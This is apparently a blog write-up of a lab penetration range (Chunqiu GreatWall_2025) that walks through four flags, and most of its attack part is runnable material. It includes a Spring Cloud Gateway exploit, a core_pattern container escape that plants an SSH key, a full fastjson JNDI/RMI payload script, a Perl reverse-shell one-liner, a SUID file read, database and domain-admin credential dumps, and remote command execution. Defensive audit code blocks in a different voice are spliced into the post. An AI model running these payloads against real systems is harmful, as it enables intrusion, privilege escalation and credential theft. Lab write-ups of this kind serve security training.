春秋云境 (Chunqiu Cloud Range) GreatWall_2025


flag01

Start with a port scan.

Ports 22 and 80 are not of much use here; port 8080 is the one to look at.
Opening it shows the classic Spring Boot error page.
Spring Boot Actuator endpoints are exposed.
So try the known CVEs directly: CVE-2022-22947 (Spring Cloud Gateway SpEL injection) is present.

The Python environment gave me some trouble for a while; if the official PyPI index does not work for Python 2.7, switch to the Tsinghua mirror.
https://github.com/0730Nophone/CVE-2022-22947-/blob/main/exp.py

If the script does not run, have an AI fix it or manually convert the print statements to Python 3 syntax.

Godzilla connects once the shell type is switched to Java.
(A tool with command echo also works here, but since the target has no outbound access, you still have to drop a webshell.)
After connecting, /.dockerenv is present, so this is clearly a Docker container; next, try a Docker escape.

Upload CDK to gather information.
The target does not accept large uploads, so transfer the binary in chunks
and then merge them:
cat cdk.* > cdk

CDK (Container DucK)
CDK Version(GitCommit): e8ec183dc9da4968794b3922e6d474ab49215303
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/

[Information Gathering - System Info]
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/passwd
    /bin/mount
    /bin/ping
    /bin/su
    /bin/umount

[Information Gathering - Services]

[Information Gathering - Commands and Capabilities]
    CapInh: 0000000000000000
    CapPrm: 00000000a80425fb
    CapEff: 00000000a80425fb
    CapBnd: 00000000a80425fb
    CapAmb: 0000000000000000
    Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:

[Information Gathering - Mounts]
0:47 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/6JC6FZQGYKHHL4O2O5VQZ2UEPE:/var/lib/docker/overlay2/l/ZNRTUHIEVJBUG4YHHAI2WF3CGQ:/var/lib/docker/overlay2/l/B7X5DEEX2MIUSMKAMKG66GHM6H:/var/lib/docker/overlay2/l/JZ26UVGDDLBIN2AV5AN2SMQ33Y:/var/lib/docker/overlay2/l/PXVXR6FJH7TBYMIBZZWZL7IYRG:/var/lib/docker/overlay2/l/5F2TSJQ5SBGSANBFCV5FWGDQYB:/var/lib/docker/overlay2/l/IQNAZRWMPNDLUYBKM7OUPGBZ4H:/var/lib/docker/overlay2/l/XJQQDLF67JL4LL4OIHGGMJMDOS,upperdir=/var/lib/docker/overlay2/0158e7b92583381e25557d75696c90d5984f79e2abcf336a060e3b1f4c21982a/diff,workdir=/var/lib/docker/overlay2/0158e7b92583381e25557d75696c90d5984f79e2abcf336a060e3b1f4c21982a/work
0:55 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:56 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:57 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:58 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:30 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:53 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:59 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,inode64
252:3 /var/lib/docker/containers/52b7e75c01a9f5f22332a1e9ab8308dbef67758a1175a3a9cd00e32e2bbc67bc/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/vda3 rw
252:3 /var/lib/docker/containers/52b7e75c01a9f5f22332a1e9ab8308dbef67758a1175a3a9cd00e32e2bbc67bc/hostname /etc/hostname rw,relatime - ext4 /dev/vda3 rw
252:3 /var/lib/docker/containers/52b7e75c01a9f5f22332a1e9ab8308dbef67758a1175a3a9cd00e32e2bbc67bc/hosts /etc/hosts rw,relatime - ext4 /dev/vda3 rw
0:24 /sys/kernel/core_pattern /host/proc/sys/kernel/core_pattern rw,nosuid,nodev,noexec,relatime - proc proc rw
0:57 /0 /dev/console rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:55 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:55 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:55 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:55 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:55 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:60 / /proc/acpi ro,relatime - tmpfs tmpfs ro,inode64
0:56 /null /proc/interrupts rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:56 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:56 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:56 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:61 / /proc/scsi ro,relatime - tmpfs tmpfs ro,inode64
0:62 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64
0:63 / /sys/devices/virtual/powercap ro,relatime - tmpfs tmpfs ro,inode64

[Information Gathering - Net Namespace]
    container net namespace isolated.

[Information Gathering - Sysctl Variables]

[Information Gathering - DNS-Based Service Discovery]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 100.100.2.138:53: read udp 172.17.0.2:44425->100.100.2.138:53: i/o timeout
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 100.100.2.138:53: read udp 172.17.0.2:58645->100.100.2.138:53: i/o timeout

[Discovery - K8s API Server]
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
    api-server forbids anonymous request.
    response:

[Discovery - K8s Service Account]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[Discovery - Cloud Provider Metadata API]
    Alibaba Cloud Metadata API available in http://100.100.100.200/latest/meta-data/
    Docs: https://help.aliyun.com/knowledge_detail/49122.html

[Exploit Pre - Kernel Exploits]
[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[Information Gathering - Sensitive Files]
    .dockerenv - /.dockerenv
    /.bashrc - /etc/skel/.bashrc
    /.bashrc - /root/.bashrc

[Information Gathering - ASLR]

[Information Gathering - Cgroups]
    0::/

[Information Gathering - Container Security]
    cgroup: NOT isolated (shared with host, cgroup:[4026532308])
    ipc: NOT isolated (shared with host, ipc:[4026532306])
    mnt: NOT isolated (shared with host, mnt:[4026532304])
    net: NOT isolated (shared with host, net:[4026532309])
    pid: NOT isolated (shared with host, pid:[4026532307])
    uts: NOT isolated (shared with host, uts:[4026532305])
2026/03/25 02:06:59 current dir: /tmp
2026/03/25 02:06:59 current user: root uid: 0 gid: 0 home: /root
2026/03/25 02:06:59 hostname: 52b7e75c01a9
2026/03/25 02:06:59 debian debian 10.9 kernel: 5.15.0-144-generic
2026/03/25 02:06:59 Setuid files found:
2026/03/25 02:06:59 service found in process:
    1   0   java
2026/03/25 02:06:59 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
2026/03/25 02:06:59 available commands:
    curl,wget,find,java,apt,dpkg,capsh,mount,fdisk,base64,perl
2026/03/25 02:06:59 net.ipv4.conf.all.route_localnet = 0
2026/03/25 02:07:39 checking if api-server allows system:anonymous request.
2026/03/25 02:07:40 failed to dial Volcano Engine (Volcengine) API.
2026/03/25 02:07:41 failed to dial Azure API.
2026/03/25 02:07:42 failed to dial Google Cloud API.
2026/03/25 02:07:43 failed to dial Tencent Cloud API.
2026/03/25 02:07:44 failed to dial OpenStack API.
2026/03/25 02:07:45 failed to dial Amazon Web Services (AWS) API.
2026/03/25 02:07:46 failed to dial ucloud API.
2026/03/25 02:07:46 refer: https://github.com/mzet-/linux-exploit-suggester
2026/03/25 02:07:49 /proc/sys/kernel/randomize_va_space file content: 2
2026/03/25 02:07:49 ASLR is enabled.
2026/03/25 02:07:49 /proc/1/cgroup file content:
2026/03/25 02:07:49 /proc/self/cgroup file added content (compare pid 1) :
2026/03/25 02:07:49 Namespace isolation status:
2026/03/25 02:07:49 Seccomp: filter mode (2)
2026/03/25 02:07:49 Seccomp: kernel supports Seccomp
2026/03/25 02:07:49 SELinux: not detected (no selinuxfs)
2026/03/25 02:07:49 AppArmor: kernel config not available
2026/03/25 02:07:49 AppArmor: no explicit AppArmor boot parameter found
2026/03/25 02:07:49 AppArmor: module is enabled (runtime)
2026/03/25 02:07:49 AppArmor: container profile: docker-default (enforce)
/tmp >
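The CapEff value in the CDK output above (0x00000000a80425fb) is worth decoding yourself when auditing a container, because the same mask appears in /proc/self/status. The following decoder is an added example, not part of the post or of CDK; the capability bit table and Docker's default set are kernel and Docker facts, while the high-risk watch list is my own assumption.

```python
import re

# Capability names indexed by bit number, as in <linux/capability.h>
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
    "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
    "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW",
    "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT",
    "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE",
    "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE",
    "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ",
    "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE",
]

# Docker's default capability set for an unprivileged container (14 caps)
DOCKER_DEFAULT = {
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FOWNER", "CAP_FSETID", "CAP_KILL", "CAP_SETGID",
    "CAP_SETUID", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_NET_RAW", "CAP_SYS_CHROOT",
    "CAP_MKNOD", "CAP_AUDIT_WRITE", "CAP_SETFCAP",
}

# Watch list (assumption): caps that typically give a path to the host when present in a container
HIGH_RISK = {"CAP_SYS_ADMIN", "CAP_SYS_PTRACE", "CAP_SYS_MODULE", "CAP_SYS_RAWIO",
             "CAP_NET_ADMIN", "CAP_DAC_READ_SEARCH", "CAP_BPF", "CAP_SYS_BOOT"}


def decode_caps(mask):
    """Turn a CapEff hex string (as printed in /proc/<pid>/status) or an int into cap names."""
    value = int(mask, 16) if isinstance(mask, str) else mask
    names = [CAP_NAMES[bit] for bit in range(len(CAP_NAMES)) if value >> bit & 1]
    # bits the table does not know (newer kernels) are reported rather than silently dropped
    unknown = [f"bit{bit}" for bit in range(len(CAP_NAMES), 64) if value >> bit & 1]
    return names + unknown


def audit_caps(mask):
    """Return (caps beyond Docker's default set, caps on the high-risk watch list)."""
    caps = set(decode_caps(mask))
    return sorted(caps - DOCKER_DEFAULT), sorted(caps & HIGH_RISK)


def capeff_from_status(text):
    """Extract the CapEff hex field from the text of /proc/<pid>/status."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", text, re.M)
    return m.group(1) if m else None
```

For the page's value both audit lists come back empty, which is exactly why the escape here goes through a writable host mount rather than through capabilities.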

Note the line 0:24 /sys/kernel/core_pattern /host/proc/sys/kernel/core_pattern rw,nosuid,nodev,noexec,relatime - proc proc rw: the host's procfs is mounted under /host/proc and core_pattern is writable from inside the container.
Modifying core_pattern gives command execution on the host:

# create the SSH directory
./cdk run mount-procfs /host/proc/ "mkdir /root/.ssh/"

# write the public key
./cdk run mount-procfs /host/proc/ 'echo ssh-rsa [public key contents] > /root/.ssh/authorized_keys'
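From the defender's side, the mount that made this escape possible is visible in the container's mount table long before anyone writes to it. The checker below is an added example (not from the post or from CDK) that parses lines in the layout CDK prints above and flags host procfs or sysfs paths mounted writable, plus a host disk root bound in; the sample lines are copied from the listing above, except the last one, which is constructed.

```python
# procfs knobs whose contents the host kernel acts on (the ones a container must never write)
SENSITIVE_PROC_ROOTS = {"/sys/kernel/core_pattern", "/sys/kernel/modprobe", "/sysrq-trigger"}


def parse_mount(line):
    """Parse 'major:minor root mountpoint opts - fstype source superopts' (the CDK layout)."""
    left, sep, right = line.strip().partition(" - ")
    lf, rf = left.split(), right.split()
    if not sep or len(lf) < 4 or len(rf) < 2:
        return None
    return {"root": lf[1], "mountpoint": lf[2], "opts": set(lf[3].split(",")),
            "fstype": rf[0], "source": rf[1]}


def audit_mounts(lines):
    """Return (mountpoint, reason) pairs for mounts that expose host kernel or disk state."""
    findings = []
    for line in lines:
        m = parse_mount(line)
        if m is None:
            continue
        rw = "rw" in m["opts"]
        if m["fstype"] == "proc" and rw and not m["mountpoint"].startswith("/proc"):
            findings.append((m["mountpoint"], "host procfs path mounted writable outside /proc"))
        elif m["fstype"] == "proc" and rw and m["root"] in SENSITIVE_PROC_ROOTS:
            findings.append((m["mountpoint"], f"{m['root']} mounted writable"))
        elif m["fstype"] == "sysfs" and rw:
            findings.append((m["mountpoint"], "sysfs mounted writable"))
        elif m["source"].startswith("/dev/") and m["root"] == "/":
            findings.append((m["mountpoint"], f"root of host device {m['source']} bind-mounted"))
    return findings


# First four lines copied from the CDK output above; the fifth is constructed for contrast
SAMPLE = [
    "0:55 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw",
    "0:58 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro",
    "252:3 /var/lib/docker/containers/52b7e75c01a9f5f22332a1e9ab8308dbef67758a1175a3a9cd00e32e2bbc67bc/hosts /etc/hosts rw,relatime - ext4 /dev/vda3 rw",
    "0:24 /sys/kernel/core_pattern /host/proc/sys/kernel/core_pattern rw,nosuid,nodev,noexec,relatime - proc proc rw",
    "0:55 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw",
]

if __name__ == "__main__":
    for mountpoint, reason in audit_mounts(SAMPLE):
        print(f"[!] {mountpoint}: {reason}")
```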

Escape succeeded (I suggest using Xshell to generate the key pair and log in; other clients work too, just with more hassle).
With an initial foothold taken, it's time to prepare for persistence and lateral movement.
First, submit the first flag.

flag02

Next, collect information about the network segments.

root@platform:/tmp# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::80df:85ff:fe60:c844  prefixlen 64  scopeid 0x20<link>
        ether 82:df:85:60:c8:44  txqueuelen 0  (Ethernet)
        RX packets 5347  bytes 14731428 (14.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7534  bytes 4498661 (4.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.22.12  netmask 255.255.255.0  broadcast 172.16.22.255
        inet6 fe80::216:3eff:fe06:ae32  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:06:ae:32  txqueuelen 1000  (Ethernet)
        RX packets 350181  bytes 35030332 (35.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 349796  bytes 35010761 (35.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 3429  bytes 251493 (251.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3429  bytes 251493 (251.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

vethd557174: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::6c6e:36ff:fe82:bcdf  prefixlen 64  scopeid 0x20<link>
        ether 6e:6e:36:82:bc:df  txqueuelen 0  (Ethernet)
        RX packets 5347  bytes 14806286 (14.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7549  bytes 4499807 (4.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

As usual, sweep the segment with fscan.

root@platform:/tmp# ./fscan -h 172.16.22.12/24

                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.16.22.12    is alive
(icmp) Target 172.16.22.14    is alive
(icmp) Target 172.16.22.41    is alive
(icmp) Target 172.16.22.88    is alive
(icmp) Target 172.16.22.253   is alive
[*] Icmp alive hosts len is: 5
172.16.22.41:445 open
172.16.22.41:139 open
172.16.22.12:22 open
172.16.22.88:22 open
172.16.22.14:22 open
172.16.22.41:135 open
172.16.22.88:80 open
172.16.22.14:80 open
172.16.22.12:80 open
172.16.22.88:8080 open
172.16.22.12:8080 open
172.16.22.41:88 open
[*] alive ports len is: 12
start vulscan
[*] WebTitle http://172.16.22.12       code:200 len:10032  title: 政务服务平台 - 门户与办事大厅
[*] NetInfo 
[*]172.16.22.41
   [->]DC
   [->]172.16.22.41
[*] WebTitle http://172.16.22.88       code:200 len:4531   title: 政务内网资源下载
[*] NetBios 172.16.22.41    [+] DC:ZWFWDC                 
[*] WebTitle http://172.16.22.14       code:200 len:10671  title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://172.16.22.88:8080  code:404 len:306    title:None

The "政务内网资源下载" (government intranet resource download) site looks the most interesting. To make proxying easier later on, set up Stowaway.
Only a forward (bind) connection is possible here, so the agent listens and the admin connects to it:

target:      ./linux_x64_agent -l 10020
attack host: ./linux_x64_admin -c 8.130.79.10:10020

Now the intranet can be reached.
After downloading the APK, the rest is reverse-engineering work.
In short, the request encryption logic lives in com.example.Mobile.MainActivity.
The target is fastjson deserialization.

import argparse
import base64
import os
import requests
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend

# ===== configuration =====
SERVER_URL = "http://172.16.22.88:8080/api/login"

# Proxy (format: http://proxy_ip:port or https://proxy_ip:port; socks5:// needs requests[socks])
# Set to None if no proxy is needed
PROXY = "socks5://123.207.100.93:10010"  # change to your proxy address, or set to None

# RSA public key taken from the Java code (Base64-encoded DER)
PUBLIC_KEY_B64 = ("MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnKum2FOeaPQumhLBpRauv+OMB6pkdqACjbZYkzzP8CZgjwEwmKauXLxzur1beldNDlVnUs83CnnvanPIYW3oP56t0SoqDmWviBTBJ2aCjtrztFYjBixZEYJ2Exp9f6cdFuSMiucPyuhwY8AuFWnGPJ3Mwt8L8ouV9Lc6Ptp67fCZ0aHr1BVu+pXvHVktbcmeCt+61dnyd9iXTDZfIQ9rwrDsTlkEYORN0hckpFWvgaoNXhXm60ioLkk/qtPZSjir0bpDL0w0iZ3+wRJLtUOe3KyGx+C00S5w2cM0Zw1XlmRQ08yj1nObVkaVsfEU8sSk/XFVnuCrO9YfQCa1uxm5ZQIDAQAB")

# ===== 1. JSON plaintext to send (default payload; override with --json) =====
DEFAULT_PLAINTEXT = """{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://172.16.22.12:50388/7862c7","autoCommit": true}"""

parser = argparse.ArgumentParser()
parser.add_argument("--json", default=DEFAULT_PLAINTEXT, help="JSON plaintext to encrypt and send")
plaintext = parser.parse_args().json

print(plaintext)

# ===== 2. generate a random AES key (128-bit) =====
aes_key = os.urandom(16)

# ===== 3. AES/GCM encryption =====
iv = os.urandom(12)  # 12-byte IV
encryptor = Cipher(algorithms.AES(aes_key),
                   modes.GCM(iv),
                   backend=default_backend()).encryptor()

ciphertext = encryptor.update(plaintext.encode("utf-8")) + encryptor.finalize()
tag = encryptor.tag

# Body = IV + ciphertext + GCM tag
body_raw = iv + ciphertext + tag
body_b64 = base64.b64encode(body_raw).decode("utf-8")

# ===== 4. encrypt the AES key with the RSA public key =====
pub_bytes = base64.b64decode(PUBLIC_KEY_B64)
public_key = serialization.load_der_public_key(pub_bytes, backend=default_backend())

enc_key = public_key.encrypt(
    aes_key,
    padding.PKCS1v15())
enc_key_b64 = base64.b64encode(enc_key).decode("utf-8")

# ===== 5. request parameters =====
headers = {
    "Content-Type": "application/octet-stream",
    "X-Encrypted-Key": enc_key_b64,
}

request_kwargs = {
    "url": SERVER_URL,
    "data": body_b64.encode("utf-8"),
    "headers": headers,
    "timeout": 10
}

# attach the proxy to the request if one is configured
if PROXY:
    request_kwargs["proxies"] = {
        "http": PROXY,
        "https": PROXY
    }
    print(f"[INFO] using proxy: {PROXY}")
else:
    print("[INFO] no proxy configured")

# ===== 6. send the POST request =====
try:
    resp = requests.post(**request_kwargs)
    print("Status:", resp.status_code)
    print("Response:", resp.text)
except requests.exceptions.ProxyError as e:
    print(f"[ERROR] proxy connection failed: {e}")
except requests.exceptions.RequestException as e:
    print(f"[ERROR] request failed: {e}")


python3 encrypt_login.py --json '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:50388/7862c7","autoCommit":true}'
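The security lesson in this step is that the app's transport envelope (AES-128-GCM body, key wrapped with RSA PKCS#1 v1.5 in X-Encrypted-Key) does nothing to protect the server from what is inside the JSON: once unwrapped, fastjson still sees the attacker's "@type". The block below is an added example, not the app's code or the post's: it mirrors the envelope on both sides and shows a server-side reject of any "@type" key before JSON-to-object binding (the real fix for fastjson is disabling autoType / enabling safeMode; this check is an extra layer). The key pair is generated locally, an assumption, because the app's private key is not known.

```python
import base64
import json
import os
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Assumption: a locally generated key pair stands in for the app's real RSA key
PRIVATE_KEY = rsa.generate_private_key(public_exponent=65537, key_size=2048)
PUBLIC_KEY = PRIVATE_KEY.public_key()


def seal(plaintext, public_key):
    """Client side, same layout as the page's script: (X-Encrypted-Key value, base64 body)."""
    aes_key, iv = os.urandom(16), os.urandom(12)
    ct_and_tag = AESGCM(aes_key).encrypt(iv, plaintext.encode("utf-8"), None)  # ct || 16-byte tag
    enc_key = public_key.encrypt(aes_key, padding.PKCS1v15())
    return base64.b64encode(enc_key).decode(), base64.b64encode(iv + ct_and_tag).decode()


def unseal(enc_key_b64, body_b64, private_key):
    """Server side: unwrap the AES key, then open IV || ciphertext || tag; raises on a bad tag."""
    aes_key = private_key.decrypt(base64.b64decode(enc_key_b64), padding.PKCS1v15())
    raw = base64.b64decode(body_b64)
    return AESGCM(aes_key).decrypt(raw[:12], raw[12:], None).decode("utf-8")


def contains_type_key(obj):
    """True if an '@type' key appears anywhere in the parsed JSON, nested objects included."""
    if isinstance(obj, dict):
        return any(k == "@type" or contains_type_key(v) for k, v in obj.items())
    if isinstance(obj, list):
        return any(contains_type_key(v) for v in obj)
    return False


def handle_login(enc_key_b64, body_b64, private_key=PRIVATE_KEY):
    """Decrypt, parse as plain data, and refuse anything that asks for a type to be instantiated."""
    data = json.loads(unseal(enc_key_b64, body_b64, private_key))
    if contains_type_key(data):
        return "rejected"
    return data
```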

Then connect with Godzilla; the password can be found in Java Chains.

That yields the second flag.

flag03

172.16.22.14 runs a Zabbix instance.
You need to go through the proxy and brute-force directories yourself.
A weak credential pair, Admin/zabbix, gets into the admin panel.
Use Zabbix's built-in command execution to spawn a reverse shell:
perl -e 'use Socket;$i="172.16.22.12";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

Shell obtained.
Trying to read the flag fails: insufficient permissions.
Privilege escalation is needed.
find / -perm -4000 -type f 2>/dev/null
ss turns out to be SUID.

ss -a -F /path/to/input-file

flag04

Moving on laterally, a domain user turns out to be configured,
but the password is not visible, and the ss trick only echoes the first line of a file, so another avenue is needed.
Since Zabbix is present there must be a database; trying to connect shows it uses a weak password:
zabbix/password
mysql -uzabbix -ppassword -e "select * from zabbix.userdirectory_ldap\G"

Man, this range is really complex; doing it solo wore me out.

For the domain part, switch to Kali and configure proxychains first.
proxychains4 bloodhound-ce-python -u ldapadmin -p XpVLGkQHm8 -d zwfw.com -dc DC.zwfw.com -ns 172.16.22.41 -c all --auth-method ntlm --dns-tcp --zip

INFO: Found 35 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.zwfw.com

Importing the data into BloodHound for analysis shows that the ldapadmin domain user's credentials can log in to the DC over WinRM; in the registry there, the domain admin password turns up: administrator / a4Z6FcRYSp6LLSGO
proxychains -q nxc smb 172.16.22.41 -u administrator -p a4Z6FcRYSp6LLSGO --codec GBK -x 'type C:\Users\Administrator\Desktop\flag.txt'
Flag obtained.

Rycarl
Copyright notice: original article on this site, published by Rycarl on 2026-03-25, 13924 characters in total.
Reprint note: unless otherwise stated, articles on this site are published under the CC 4.0 license; please credit the source when reprinting.